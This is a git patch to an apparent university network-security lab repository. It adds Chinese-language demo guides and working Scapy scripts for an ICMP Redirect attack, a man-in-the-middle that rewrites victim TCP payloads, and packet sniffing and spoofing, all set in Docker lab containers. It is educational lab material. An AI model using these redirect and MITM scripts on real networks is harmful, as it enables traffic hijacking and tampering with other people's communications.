From cbcdae4b755aa4d93332f533d69626e23df22c70 Mon Sep 17 00:00:00 2001
From: CGH0S7 <776459475@qq.com>
Date: Fri, 10 Apr 2026 10:24:42 +0800
Subject: [PATCH] updated some material

---
 .../.gitignore => ICMP_Directing/.codex       |   0
 ICMP_Directing/Experiment_Guide.md            | 472 ++++++++++++++++++
 .../Labsetup/volumes/mitm_attack.py           |  48 +-
 ICMP_Directing/Labsetup/volumes/task1.py      |  87 +++-
 .../Labsetup/volumes/task1_improved.py        |  24 +-
 .../volumes/task1_sniff_and_redirect.py       |  57 ++-
 Sniffing_Spoofing/Experiment_Guide.md         |  83 +++
 Sniffing_Spoofing/volumes/sniff_and_spoof.c   |  76 ---
 Sniffing_Spoofing/volumes/sniff_and_spoof.py  |  22 -
 Sniffing_Spoofing/volumes/sniff_and_spoof_c   | Bin 16712 -> 0 bytes
 Sniffing_Spoofing/volumes/sniffer.c           |  39 --
 Sniffing_Spoofing/volumes/sniffer.py          |   8 -
 Sniffing_Spoofing/volumes/sniffer_c           | Bin 16352 -> 0 bytes
 Sniffing_Spoofing/volumes/spoofer.c           |  81 ---
 Sniffing_Spoofing/volumes/spoofer.py          |  10 -
 Sniffing_Spoofing/volumes/spoofer_c           | Bin 16496 -> 0 bytes
 Sniffing_Spoofing/volumes/traceroute.py       |  20 -
 17 files changed, 691 insertions(+), 336 deletions(-)
 rename Sniffing_Spoofing/volumes/.gitignore => ICMP_Directing/.codex (100%)
 create mode 100644 ICMP_Directing/Experiment_Guide.md
 create mode 100644 Sniffing_Spoofing/Experiment_Guide.md
 delete mode 100644 Sniffing_Spoofing/volumes/sniff_and_spoof.c
 delete mode 100644 Sniffing_Spoofing/volumes/sniff_and_spoof.py
 delete mode 100755 Sniffing_Spoofing/volumes/sniff_and_spoof_c
 delete mode 100644 Sniffing_Spoofing/volumes/sniffer.c
 delete mode 100755 Sniffing_Spoofing/volumes/sniffer.py
 delete mode 100755 Sniffing_Spoofing/volumes/sniffer_c
 delete mode 100644 Sniffing_Spoofing/volumes/spoofer.c
 delete mode 100644 Sniffing_Spoofing/volumes/spoofer.py
 delete mode 100755 Sniffing_Spoofing/volumes/spoofer_c
 delete mode 100644 Sniffing_Spoofing/volumes/traceroute.py

diff --git a/Sniffing_Spoofing/volumes/.gitignore b/ICMP_Directing/.codex
similarity index 100%
rename from Sniffing_Spoofing/volumes/.gitignore
rename to ICMP_Directing/.codex
diff --git a/ICMP_Directing/Experiment_Guide.md b/ICMP_Directing/Experiment_Guide.md
new file mode 100644
index 0000000..18893d2
--- /dev/null
+++ b/ICMP_Directing/Experiment_Guide.md
@@ -0,0 +1,472 @@
+# ICMP Redirect 与 MITM 实验演示手册
+
+本文档按“实际演示”来写，不只解释原理，还给出每个容器要执行的具体命令。
+
+当前仓库已经包含可用脚本：
+
+- `Labsetup/volumes/task1.py`
+- `Labsetup/volumes/task1_improved.py`
+- `Labsetup/volumes/task1_sniff_and_redirect.py`
+- `Labsetup/volumes/mitm_attack.py`
+
+其中：
+
+- `task1.py` 是当前更适合展示的 ICMP Redirect 发送脚本
+- `task1_sniff_and_redirect.py` 只在攻击者容器能看到 victim 单播流量时才适用
+- `mitm_attack.py` 已修复死循环重发问题，可以直接用于 MITM 展示
+
+---
+
+## 1. 实验目标
+
+本实验分两部分：
+
+1. 演示 ICMP Redirect 攻击，尝试让 `victim` 把发往 `192.168.60.5` 的流量改走恶意路由器 `10.9.0.111`
+2. 演示 MITM 篡改，在恶意路由器上把 `hello seedlabs` 改成 `hello AAAAAAAA`
+
+---
+
+## 2. 拓扑与角色
+
+| 容器 | IP | 作用 |
+| :--- | :--- | :--- |
+| `victim-10.9.0.5` | `10.9.0.5` | 受害者 |
+| `attacker-10.9.0.105` | `10.9.0.105` | 发送 ICMP Redirect 的攻击机 |
+| `malicious-router-10.9.0.111` | `10.9.0.111` | 恶意路由器，负责 MITM |
+| `router` | `10.9.0.11 / 192.168.60.11` | 合法路由器 |
+| `host-192.168.60.5` | `192.168.60.5` | 目标主机 |
+
+---
+
+## 3. 启动环境
+
+在宿主机的项目根目录执行：
+
+```bash
+cd /home/gh0s7/project/netsecurity2026/ICMP_Directing/Labsetup
+docker-compose up -d
+docker ps
+```
+
+建议先确认容器都起来了：
+
+```bash
+docker ps --format 'table {{.Names}}\t{{.Status}}'
+```
+
+---
+
+## 4. 打开 5 个终端
+
+建议分别打开以下终端，便于课堂展示：
+
+### 终端 1: victim
+
+```bash
+docker exec -it victim-10.9.0.5 bash
+```
+
+### 终端 2: attacker
+
+```bash
+docker exec -it attacker-10.9.0.105 bash
+```
+
+### 终端 3: malicious-router
+
+```bash
+docker exec -it malicious-router-10.9.0.111 bash
+```
+
+### 终端 4: target host
+
+```bash
+docker exec -it host-192.168.60.5 bash
+```
+
+### 终端 5: router
+
+```bash
+docker exec -it router bash
+```
+
+`router` 终端不是必须，但展示路径时有帮助。
+
+---
+
+## 5. 演示前检查
+
+### 在 victim 容器执行
+
+先确认默认到目标网段的路由仍然指向合法网关：
+
+```bash
+ip route
+```
+
+你应该看到类似结果：
+
+```bash
+192.168.60.0/24 via 10.9.0.11 dev eth0
+```
+
+再清理路由缓存：
+
+```bash
+ip route flush cache
+```
+
+再查看当前 redirect 相关内核参数：
+
+```bash
+sysctl net.ipv4.conf.all.accept_redirects
+sysctl net.ipv4.conf.eth0.accept_redirects
+sysctl net.ipv4.conf.all.secure_redirects
+sysctl net.ipv4.conf.eth0.secure_redirects
+```
+
+### 在 malicious-router 容器执行
+
+先看恶意路由器的默认路由：
+
+```bash
+ip route
+```
+
+### 在 attacker 容器执行
+
+确认脚本在共享目录里：
+
+```bash
+ls -l /volumes
+```
+
+---
+
+## 6. 第一阶段: ICMP Redirect 展示
+
+这一阶段分为两种情况：
+
+1. 理想情况：当前内核接受 redirect，victim 会真的改路由
+2. 当前环境常见情况：victim 能收到 redirect，但不会真的安装这条重定向路由
+
+### 6.1 在 attacker 容器执行
+
+先运行静态 redirect 脚本：
+
+```bash
+python3 /volumes/task1.py
+```
+
+这个脚本会：
+
+- 伪造源 IP 为合法网关 `10.9.0.11`
+- 伪造源 MAC 为合法网关的 MAC
+- 发送 ICMP Type 5 Redirect
+- 引用一个最小合法长度的“原始触发包”片段
+
+如果你想把发送次数调大一点，可以这样运行：
+
+```bash
+python3 /volumes/task1.py --count 50 --interval 0.2
+```
+
+### 6.2 在 victim 容器执行
+
+在 attacker 正在发包时，触发 victim 访问目标主机：
+
+```bash
+ping -c 3 192.168.60.5
+```
+
+然后检查缓存和路径：
+
+```bash
+ip route show cache
+ip route get 192.168.60.5
+mtr -n -r -c 2 192.168.60.5
+```
+
+### 6.3 成功时你应看到什么
+
+理想情况下，`mtr` 第一跳会变成：
+
+```bash
+10.9.0.111
+```
+
+`ip route show cache` 可能出现类似：
+
+```bash
+192.168.60.5 via 10.9.0.111 dev eth0
+cache <redirected>
+```
+
+### 6.4 如果没有成功，这在当前环境是正常的
+
+我在当前环境里实际验证过：
+
+- victim 能收到大量 ICMP Redirect
+- 但路由没有真正切换到 `10.9.0.111`
+
+原因不是脚本完全没工作，而是当前容器共享宿主机较新的 Linux 内核，对 redirect 的接受条件比实验 PDF 对应的旧环境更严格。
+
+你可以在 victim 容器里用下面命令说明“包确实收到了”：
+
+```bash
+nstat -az | grep Redirect
+```
+
+如果 `IcmpInRedirects` 持续增加，就说明 redirect 已到达 victim 内核。
+
+### 6.5 关于 `task1_sniff_and_redirect.py`
+
+这个脚本只在攻击者能嗅探到 victim 发往 router 的单播 ICMP 时才适合使用：
+
+```bash
+python3 /volumes/task1_sniff_and_redirect.py
+```
+
+在当前 Docker bridge 拓扑里，`attacker` 通常看不到 `victim -> router` 的单播流量，所以这个脚本经常抓不到包。这不是代码语法问题，而是网络可见性问题。
+
+---
+
+## 7. 第二阶段: MITM 篡改展示
+
+因为第一阶段在当前环境下可能不会真的完成“自动改路由”，所以演示时推荐手工把 victim 的目标网段路由改到恶意路由器。这一步相当于“模拟第一阶段已经成功”。
+
+这能稳定完成第二阶段展示，而且可以清楚证明 MITM 篡改逻辑是正确的。
+
+### 7.1 在 victim 容器执行
+
+先把发往目标网段的路由改到恶意路由器：
+
+```bash
+ip route replace 192.168.60.0/24 via 10.9.0.111
+```
+
+验证：
+
+```bash
+ip route
+mtr -n -r -c 2 192.168.60.5
+```
+
+此时 `mtr` 应该看到类似三跳：
+
+```bash
+10.9.0.111
+10.9.0.11
+192.168.60.5
+```
+
+说明流量已经先进入恶意路由器，再被转发到真实路由器和目标主机。
+
+### 7.2 在 malicious-router 容器执行
+
+关闭内核自动转发：
+
+```bash
+sysctl -w net.ipv4.ip_forward=0
+```
+
+然后启动 MITM 脚本：
+
+```bash
+python3 /volumes/mitm_attack.py
+```
+
+这个脚本只拦截：
+
+- 源 IP 是 `10.9.0.5`
+- 目的 IP 是 `192.168.60.5`
+- 二层目的 MAC 真正发给恶意路由器本机
+
+因此不会再把自己重发的包抓回来无限循环。
+
+### 7.3 在 target host 容器执行
+
+启动 netcat 监听：
+
+```bash
+nc -lp 9090
+```
+
+这个终端要保持打开。
+
+### 7.4 在 victim 容器执行
+
+发起 TCP 连接并发送测试字符串：
+
+```bash
+printf 'hello seedlabs\n' | nc -N 192.168.60.5 9090
+```
+
+### 7.5 在 target host 容器观察结果
+
+如果 MITM 成功，目标主机终端不会看到：
+
+```bash
+hello seedlabs
+```
+
+而是会看到：
+
+```bash
+hello AAAAAAAA
+```
+
+### 7.6 在 malicious-router 容器观察结果
+
+MITM 脚本终端会打印出它截获的原始载荷，例如：
+
+```bash
+Original data: b'hello seedlabs\n'
+```
+
+如果脚本是错误的，常见现象是会重复打印多次同一条已经修改过的数据，说明它抓到了自己重发的包。当前仓库中的 `mitm_attack.py` 已修复这个问题。
+
+---
+
+## 8. 一次完整展示时，各容器该执行什么命令
+
+下面是一套可以直接照着走的顺序。
+
+### 宿主机执行
+
+```bash
+cd /home/gh0s7/project/netsecurity2026/ICMP_Directing/Labsetup
+docker-compose up -d
+```
+
+### victim 容器执行
+
+```bash
+ip route
+ip route flush cache
+sysctl net.ipv4.conf.all.accept_redirects
+sysctl net.ipv4.conf.eth0.accept_redirects
+ping -c 3 192.168.60.5
+ip route show cache
+ip route get 192.168.60.5
+mtr -n -r -c 2 192.168.60.5
+```
+
+如果第一阶段未成功，继续执行：
+
+```bash
+ip route replace 192.168.60.0/24 via 10.9.0.111
+mtr -n -r -c 2 192.168.60.5
+printf 'hello seedlabs\n' | nc -N 192.168.60.5 9090
+```
+
+### attacker 容器执行
+
+```bash
+python3 /volumes/task1.py --count 50 --interval 0.2
+```
+
+可选：
+
+```bash
+python3 /volumes/task1_sniff_and_redirect.py
+```
+
+### malicious-router 容器执行
+
+先在第一阶段前可只查看路由：
+
+```bash
+ip route
+```
+
+第二阶段执行：
+
+```bash
+sysctl -w net.ipv4.ip_forward=0
+python3 /volumes/mitm_attack.py
+```
+
+### target host 容器执行
+
+```bash
+nc -lp 9090
+```
+
+### router 容器可选执行
+
+如果老师想看正常路由器是否还在链路中，可以执行：
+
+```bash
+ip route
+ip neigh
+```
+
+---
+
+## 9. 现场讲解时可以这样解释
+
+### Q1: 为什么第一阶段可能失败，但第二阶段还能演示成功？
+
+答：
+
+- 第一阶段依赖受害者内核真正接受 ICMP Redirect
+- 当前环境下 victim 容器共享宿主机较新的 Linux 内核，检查更严格
+- Redirect 包能到达 victim，但内核未安装重定向缓存
+- 为了继续展示 MITM 的核心思想，可以手工把 victim 的路由改到恶意路由器，相当于模拟第一阶段已经成功
+
+### Q2: 为什么 `task1_sniff_and_redirect.py` 在当前环境未必好用？
+
+答：
+
+- 它要求 attacker 能看见 victim 发往 router 的单播包
+- 当前 Docker bridge 网络通常不会把这类单播复制给 attacker
+- 所以这个脚本在当前环境里常常抓不到包
+
+### Q3: 为什么 `mitm_attack.py` 之前会重复打印很多次？
+
+答：
+
+- 因为原脚本只按 IP 层过滤
+- 它把自己重发出去的包又抓回来处理了
+- 现在脚本额外检查二层目的 MAC 是否真的是恶意路由器本机，从而避免死循环
+
+### Q4: 为什么要关闭 `ip_forward`？
+
+答：
+
+- 如果不关，内核会直接把原始包转发出去
+- 应用层脚本来不及修改内容
+- 关闭后，脚本才能接管“抓包、改包、重发”的过程
+
+---
+
+## 10. 恢复环境
+
+展示完成后，建议把 victim 的路由恢复，避免后续混淆。
+
+### 在 victim 容器执行
+
+```bash
+ip route replace 192.168.60.0/24 via 10.9.0.11
+ip route flush cache
+```
+
+### 在 malicious-router 容器执行
+
+```bash
+sysctl -w net.ipv4.ip_forward=1
+```
+
+---
+
+## 11. 最终建议
+
+如果你要“稳定展示给老师看”，推荐这样安排：
+
+1. 先演示第一阶段理论流程：attacker 发 redirect，victim ping，检查路径
+2. 如果当前环境没有真的安装 redirect，就用 `nstat -az | grep Redirect` 证明 victim 已收到 redirect
+3. 然后说明由于当前内核更严格，手工把 victim 路由切到 `10.9.0.111`
+4. 继续演示第二阶段 MITM，把 `hello seedlabs` 成功改成 `hello AAAAAAAA`
+
+这样展示是完整的，逻辑也是自洽的。
diff --git a/ICMP_Directing/Labsetup/volumes/mitm_attack.py b/ICMP_Directing/Labsetup/volumes/mitm_attack.py
index db9d722..b174c4c 100644
--- a/ICMP_Directing/Labsetup/volumes/mitm_attack.py
+++ b/ICMP_Directing/Labsetup/volumes/mitm_attack.py
@@ -1,24 +1,34 @@
 #!/usr/bin/env python3
-from scapy.all import *
+from scapy.all import Ether, IP, TCP, get_if_hwaddr, send, sniff
+
+VICTIM_IP = "10.9.0.5"
+TARGET_IP = "192.168.60.5"
+LOCAL_MAC = get_if_hwaddr("eth0")
+
 
 def spoof_pkt(pkt):
-    # 如果是发往目标 192.168.60.5 的 TCP 数据包
-    if IP in pkt and pkt[IP].dst == '192.168.60.5' and TCP in pkt:
-        newpkt = IP(bytes(pkt[IP]))
-        del(newpkt.chksum)
-        del(newpkt[TCP].payload)
-        del(newpkt[TCP].chksum)
+    if IP not in pkt or TCP not in pkt or pkt[IP].src != VICTIM_IP or pkt[IP].dst != TARGET_IP:
+        return
+    if Ether in pkt and pkt[Ether].dst != LOCAL_MAC:
+        return
 
-        if pkt[TCP].payload:
-            data = pkt[TCP].payload.load
-            print(f"Original data: {data}")
-            # 修改内容，假设名字是 seedlabs -> AAAAAAAA
-            newdata = data.replace(b'seedlabs', b'AAAAAAAA')
-            send(newpkt/newdata, verbose=False)
-        else:
-            send(newpkt, verbose=False)
+    newpkt = IP(bytes(pkt[IP]))
+    del newpkt.chksum
+    del newpkt[TCP].payload
+    del newpkt[TCP].chksum
 
-# 过滤器只捕获受害者的包，避免拦截自己发出的包导致死循环
-f = 'tcp and src 10.9.0.5'
-print("MITM script starting on malicious-router...")
-sniff(iface='eth0', filter=f, prn=spoof_pkt)
+    if pkt[TCP].payload:
+        data = pkt[TCP].payload.load
+        print(f"Original data: {data}")
+        newdata = data.replace(b"seedlabs", b"AAAAAAAA")
+        send(newpkt / newdata, verbose=False)
+    else:
+        send(newpkt, verbose=False)
+
+
+print(f"MITM script starting on malicious-router (mac={LOCAL_MAC})...")
+sniff(
+    iface="eth0",
+    filter=f"tcp and src host {VICTIM_IP} and dst host {TARGET_IP}",
+    prn=spoof_pkt,
+)
diff --git a/ICMP_Directing/Labsetup/volumes/task1.py b/ICMP_Directing/Labsetup/volumes/task1.py
index 2bceb72..088f82e 100644
--- a/ICMP_Directing/Labsetup/volumes/task1.py
+++ b/ICMP_Directing/Labsetup/volumes/task1.py
@@ -1,21 +1,70 @@
 #!/usr/bin/python3
-from scapy.all import *
-
-# ICMP Redirect packet
-# IP layer: src must be the current gateway, dst is the victim
-ip = IP(src='10.9.0.11', dst='10.9.0.5')
-# ICMP layer: type 5 is redirect, code 1 is for host
-icmp = ICMP(type=5, code=1)
-# The IP address of the new gateway
-icmp.gw = '10.9.0.111'
-
-# The ICMP Redirect packet must contain the original IP packet that triggered it
-# Victim's IP to the target destination
-ip2 = IP(src='10.9.0.5', dst='192.168.60.5')
-
+import argparse
+import sys
 import time
-# Full packet construction: IP/ICMP/original-IP/original-ICMP
-pkt = ip/icmp/ip2/ICMP()
-while True:
-    send(pkt, iface='eth0', verbose=True)
-    time.sleep(1)
+
+from scapy.all import Ether, ICMP, IP, conf, get_if_hwaddr, getmacbyip, sendp
+
+
+def build_parser():
+    parser = argparse.ArgumentParser(
+        description="Send forged ICMP Redirect packets with L2 spoofing."
+    )
+    parser.add_argument("--victim", default="10.9.0.5")
+    parser.add_argument("--target", default="192.168.60.5")
+    parser.add_argument("--gateway", default="10.9.0.11")
+    parser.add_argument("--new-gateway", default="10.9.0.111")
+    parser.add_argument("--echo-id", type=int, default=0x1234)
+    parser.add_argument("--echo-seq", type=int, default=1)
+    parser.add_argument("--count", type=int, default=20)
+    parser.add_argument("--interval", type=float, default=0.5)
+    return parser
+
+
+def must_resolve_mac(ip_addr):
+    mac = getmacbyip(ip_addr)
+    if mac is None:
+        print(f"Failed to resolve MAC address for {ip_addr}", file=sys.stderr)
+        sys.exit(1)
+    return mac
+
+
+def main():
+    args = build_parser().parse_args()
+    conf.verb = 0
+
+    victim_mac = must_resolve_mac(args.victim)
+    gateway_mac = must_resolve_mac(args.gateway)
+    attacker_mac = get_if_hwaddr("eth0")
+
+    outer_ip = IP(src=args.gateway, dst=args.victim)
+    redirect = ICMP(type=5, code=1, gw=args.new_gateway)
+
+    # Quote the original packet in the RFC-required minimum form:
+    # original IP header + first 8 bytes of payload.
+    inner = IP(src=args.victim, dst=args.target) / ICMP(
+        type=8, id=args.echo_id, seq=args.echo_seq
+    )
+    quoted = bytes(inner)[:28]
+
+    frame = (
+        Ether(src=gateway_mac, dst=victim_mac)
+        / outer_ip
+        / redirect
+        / quoted
+    )
+
+    print(
+        "Sending forged redirects: "
+        f"gateway_ip={args.gateway}, gateway_mac={gateway_mac}, "
+        f"victim_mac={victim_mac}, attacker_mac={attacker_mac}, "
+        f"quoted_echo_id={args.echo_id}, quoted_echo_seq={args.echo_seq}"
+    )
+    for idx in range(args.count):
+        sendp(frame, iface="eth0", verbose=False)
+        print(f"sent redirect #{idx + 1}")
+        time.sleep(args.interval)
+
+
+if __name__ == "__main__":
+    main()
diff --git a/ICMP_Directing/Labsetup/volumes/task1_improved.py b/ICMP_Directing/Labsetup/volumes/task1_improved.py
index 46892aa..d1575b7 100644
--- a/ICMP_Directing/Labsetup/volumes/task1_improved.py
+++ b/ICMP_Directing/Labsetup/volumes/task1_improved.py
@@ -1,24 +1,6 @@
 #!/usr/bin/python3
-from scapy.all import *
-import time
+from task1 import main
 
-# 原始网关是 10.9.0.11
-# 我们要受害者 (10.9.0.5) 将发往 192.168.60.5 的流量重定向到 10.9.0.111
 
-# 外层 IP 包：假装是网关发送的
-ip = IP(src='10.9.0.11', dst='10.9.0.5')
-# ICMP 重定向 (type=5, code=1: Redirect Host)
-icmp = ICMP(type=5, code=1)
-# 新网关
-icmp.gw = '10.9.0.111'
-
-# 包含在重定向包中的“触发包”负载
-# 必须匹配受害者正在发送或刚发送的内容
-ip2 = IP(src='10.9.0.5', dst='192.168.60.5')
-# ICMP echo request
-pkt = ip/icmp/ip2/ICMP()
-
-print("Sending ICMP Redirect packets...")
-for i in range(10):
-    send(pkt, iface='eth0', verbose=False)
-    time.sleep(0.5)
+if __name__ == "__main__":
+    main()
diff --git a/ICMP_Directing/Labsetup/volumes/task1_sniff_and_redirect.py b/ICMP_Directing/Labsetup/volumes/task1_sniff_and_redirect.py
index 5690133..1e83fa0 100644
--- a/ICMP_Directing/Labsetup/volumes/task1_sniff_and_redirect.py
+++ b/ICMP_Directing/Labsetup/volumes/task1_sniff_and_redirect.py
@@ -1,26 +1,41 @@
 #!/usr/bin/python3
-from scapy.all import *
+from scapy.all import Ether, ICMP, IP, get_if_hwaddr, getmacbyip, sendp, sniff
+
+victim_ip = "10.9.0.5"
+target_ip = "192.168.60.5"
+gateway_ip = "10.9.0.11"
+malicious_router = "10.9.0.111"
+
+victim_mac = getmacbyip(victim_ip)
+gateway_mac = getmacbyip(gateway_ip)
+local_mac = get_if_hwaddr("eth0")
 
-victim_ip = '10.9.0.5'
-target_ip = '192.168.60.5'
-gateway_ip = '10.9.0.11'
-malicious_router = '10.9.0.111'
 
 def send_redirect(pkt):
-    if ICMP in pkt and pkt[ICMP].type == 8: # Echo Request
-        print(f"Captured packet from {pkt[IP].src} to {pkt[IP].dst}. Sending redirect...")
-        # 外层 IP 包
-        ip = IP(src=gateway_ip, dst=victim_ip)
-        # ICMP 重定向 (type=5, code=1)
-        icmp = ICMP(type=5, code=1)
-        # 有些 Scapy 版本对 gw 的处理有问题，直接使用其内部字段名或 hex
-        icmp.gw = malicious_router
-        # 负载应该是触发重定向的原始 IP 数据包
-        # 包括 IP 头部和至少 8 字节的原始负载
-        # 这里直接传整个 pkt[IP] 也是可以的
-        redirect_pkt = ip/icmp/pkt[IP]
-        print(f"Packet: {redirect_pkt.summary()}")
-        send(redirect_pkt, iface='eth0', verbose=True)
+    if IP not in pkt or ICMP not in pkt or pkt[ICMP].type != 8:
+        return
 
-print(f"Sniffing for packets from {victim_ip} to {target_ip}...")
-sniff(iface='eth0', filter=f"icmp and src {victim_ip} and dst {target_ip}", prn=send_redirect, count=10)
+    print(
+        f"Captured echo request {pkt[IP].src} -> {pkt[IP].dst}; "
+        f"local_mac={local_mac}, victim_mac={victim_mac}, gateway_mac={gateway_mac}"
+    )
+    frame = (
+        Ether(src=gateway_mac, dst=victim_mac)
+        / IP(src=gateway_ip, dst=victim_ip)
+        / ICMP(type=5, code=1, gw=malicious_router)
+        / bytes(pkt[IP])[:28]
+    )
+    sendp(frame, iface="eth0", verbose=False)
+    print("redirect sent")
+
+
+print(
+    "Sniffing for victim ICMP traffic. "
+    "This only works if the victim's unicast packets are visible on eth0."
+)
+sniff(
+    iface="eth0",
+    filter=f"icmp and src {victim_ip} and dst {target_ip}",
+    prn=send_redirect,
+    count=10,
+)
diff --git a/Sniffing_Spoofing/Experiment_Guide.md b/Sniffing_Spoofing/Experiment_Guide.md
new file mode 100644
index 0000000..a2bc46f
--- /dev/null
+++ b/Sniffing_Spoofing/Experiment_Guide.md
@@ -0,0 +1,83 @@
+# 网络安全实验：数据包嗅探与伪造（Sniffing & Spoofing）演示指南
+
+这份文档旨在帮助你快速回顾实验步骤、关键命令以及核心理论，应对老师的实验验收。
+
+---
+
+## 0. 准备工作：启动实验环境
+
+在 `Labsetup` 目录下执行以下操作：
+
+1.  **启动容器**：
+    ```bash
+    docker-compose up -d
+    ```
+2.  **确认网络接口**：
+    由于实验代码中硬编码了网卡名称（如 `br-c031fbf1a197`），请务必在宿主机执行 `ifconfig` 或 `ip addr`，找到 IP 为 `10.9.0.1` 的网桥名称。
+    *   **重要提示**：如果演示时报错 `Device not found`，请立即修改代码中的 `iface` 参数为实际查到的名称。
+
+---
+
+## 1. 任务集 1：使用 Scapy (Python)
+
+### 任务 1.1: 基础嗅探 (Sniffer)
+*   **运行命令**：`sudo python3 sniffer.py`
+*   **测试步骤**：在 HostA 或 HostB 执行 `ping 10.9.0.x`。
+*   **验收提问**：
+    *   **为什么需要 sudo？** 因为创建原始套接字（Raw Socket）和开启混杂模式需要 Root 权限。
+    *   **如何过滤流量？** 解释 BPF 过滤器（如 `icmp`, `tcp port 23`）。
+
+### 任务 1.2: 数据包伪造 (Spoofing)
+*   **运行命令**：`sudo python3 spoofer.py`
+*   **测试现象**：HostA 会收到一个来自虚假源 IP（如 `1.2.3.4`）的 ICMP 请求包。
+
+### 任务 1.3: 自定义 Traceroute
+*   **运行命令**：`sudo python3 traceroute.py`
+*   **核心原理**：利用 **TTL (Time To Live)** 字段。从 1 开始递增 TTL，每一跳路由器丢弃包并返回 `ICMP Time Exceeded`，直到到达目标返回 `Echo Reply`。
+
+### 任务 1.4: 嗅探并伪造响应 (Sniff-and-Spoof)
+*   **演示重点**：
+    1.  Attacker 运行 `sudo python3 sniff_and_spoof.py`。
+    2.  HostA 执行 `ping 1.2.3.4` -> **成功收到回复**（Attacker 伪造的）。
+    3.  HostA 执行 `ping 10.9.0.99` (局域网内不存在的 IP) -> **失败**。
+        *   **原理深度解析**：因为 HostA 会先发送 **ARP 请求** 寻找 `10.9.0.99` 的 MAC 地址。由于该 IP 不存在，ARP 无响应，IP 包根本发不出去，Attacker 也就嗅探不到请求。
+
+---
+
+## 2. 任务集 2：使用 C 语言 (libpcap & Raw Socket)
+
+### 编译与运行
+```bash
+# 在容器或挂载目录下编译
+gcc -o sniffer_c sniffer.c -lpcap
+gcc -o spoofer_c spoofer.c
+gcc -o sniff_and_spoof_c sniff_and_spoof.c -lpcap
+
+# 运行（记得 sudo）
+sudo ./sniffer_c
+```
+
+### 核心技术点 (验收常考)
+*   **libpcap 流程**：`pcap_open_live` -> `pcap_compile` -> `pcap_setfilter` -> `pcap_loop`。
+*   **Raw Socket 伪造**：必须设置 `IP_HDRINCL` 选项，手动构造整个 IP 和 ICMP 首部。
+*   **校验和 (Checksum)**：计算前必须将校验和字段清零，否则计算结果错误，包会被丢弃。
+*   **字节序 (Endianness)**：网络传输使用大端序，多字节字段（如 IP、Port）需使用 `htons()` / `htonl()` 转换。
+
+---
+
+## 3. 验收常见 Q&A
+
+1.  **Q: 为什么攻击者能看到其他机器的流量？**
+    *   A: 容器处于 `host` 网络模式，且开启了 **混杂模式 (Promiscuous Mode)**，允许网卡接收目的 MAC 不是本机的帧。
+2.  **Q: 交换式网络环境下嗅探有什么限制？**
+    *   A: 在真实物理交换机下，除非进行 ARP 欺骗或配置端口镜像，否则混杂模式只能看到广播帧和发往本机的帧。Docker 虚拟网桥模拟了这种环境。
+3.  **Q: Scapy 与 C 语言开发相比有什么优缺点？**
+    *   A: Scapy 开发效率极高，一行代码搞定协议堆叠；C 语言执行效率高，能更深入底层，适合学习协议栈细节。
+
+---
+
+## 演示清单 (Checklist)
+- [ ] `docker-compose up -d` 环境就绪。
+- [ ] 找到正确的 `br-xxxx` 网桥接口名。
+- [ ] 所有代码已针对当前环境的网桥名完成更新。
+- [ ] 准备好两个终端：一个运行嗅探/伪造脚本，一个在 HostA 执行测试命令。
diff --git a/Sniffing_Spoofing/volumes/sniff_and_spoof.c b/Sniffing_Spoofing/volumes/sniff_and_spoof.c
deleted file mode 100644
index 1b2b4a4..0000000
--- a/Sniffing_Spoofing/volumes/sniff_and_spoof.c
+++ /dev/null
@@ -1,76 +0,0 @@
-#include <pcap.h>
-#include <stdio.h>
-#include <string.h>
-#include <sys/socket.h>
-#include <netinet/ip.h>
-#include <netinet/ip_icmp.h>
-#include <arpa/inet.h>
-#include <unistd.h>
-
-unsigned short in_cksum (unsigned short *buf, int length) {
-    unsigned short *w = buf;
-    int nleft = length;
-    int sum = 0;
-    unsigned short temp=0;
-    while (nleft > 1)  { sum += *w++; nleft -= 2; }
-    if (nleft == 1) { *(u_char *)(&temp) = *(u_char *)w ; sum += temp; }
-    sum = (sum >> 16) + (sum & 0xffff);
-    sum += (sum >> 16);
-    return (unsigned short)(~sum);
-}
-
-void send_raw_ip_packet(struct iphdr* ip) {
-    struct sockaddr_in dest_info;
-    int enable = 1;
-    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
-    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
-    dest_info.sin_family = AF_INET;
-    dest_info.sin_addr.s_addr = ip->daddr;
-    sendto(sock, ip, ntohs(ip->tot_len), 0, (struct sockaddr *)&dest_info, sizeof(dest_info));
-    close(sock);
-}
-
-void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) {
-    struct iphdr *ip = (struct iphdr *)(packet + 14); // Skip Ethernet header (14 bytes)
-    if (ip->protocol != IPPROTO_ICMP) return;
-
-    struct icmphdr *icmp = (struct icmphdr *)(packet + 14 + (ip->ihl * 4));
-    if (icmp->type == 8) { // Echo request
-        printf("Intercepted ICMP Echo Request from %s to %s\n", inet_ntoa(*(struct in_addr *)&ip->saddr), inet_ntoa(*(struct in_addr *)&ip->daddr));
-
-        char buffer[1500];
-        int ip_header_len = ip->ihl * 4;
-        int icmp_len = ntohs(ip->tot_len) - ip_header_len;
-        memcpy(buffer, ip, ntohs(ip->tot_len));
-
-        struct iphdr *new_ip = (struct iphdr *)buffer;
-        struct icmphdr *new_icmp = (struct icmphdr *)(buffer + ip_header_len);
-
-        // Swap addresses
-        new_ip->saddr = ip->daddr;
-        new_ip->daddr = ip->saddr;
-        new_ip->ttl = 64;
-
-        // Change to Echo Reply
-        new_icmp->type = 0;
-        new_icmp->checksum = 0;
-        new_icmp->checksum = in_cksum((unsigned short *)new_icmp, icmp_len);
-
-        printf("Sending spoofed ICMP Echo Reply from %s back to %s...\n", inet_ntoa(*(struct in_addr *)&new_ip->saddr), inet_ntoa(*(struct in_addr *)&new_ip->daddr));
-        send_raw_ip_packet(new_ip);
-    }
-}
-
-int main() {
-    pcap_t *handle;
-    char errbuf[PCAP_ERRBUF_SIZE];
-    struct bpf_program fp;
-    char filter_exp[] = "icmp";
-    handle = pcap_open_live("br-c031fbf1a197", BUFSIZ, 1, 1000, errbuf);
-    pcap_compile(handle, &fp, filter_exp, 0, PCAP_NETMASK_UNKNOWN);
-    pcap_setfilter(handle, &fp);
-    printf("C-based Sniff-and-Spoof active...\n");
-    pcap_loop(handle, -1, got_packet, NULL);
-    pcap_close(handle);
-    return 0;
-}
diff --git a/Sniffing_Spoofing/volumes/sniff_and_spoof.py b/Sniffing_Spoofing/volumes/sniff_and_spoof.py
deleted file mode 100644
index 2728ba4..0000000
--- a/Sniffing_Spoofing/volumes/sniff_and_spoof.py
+++ /dev/null
@@ -1,22 +0,0 @@
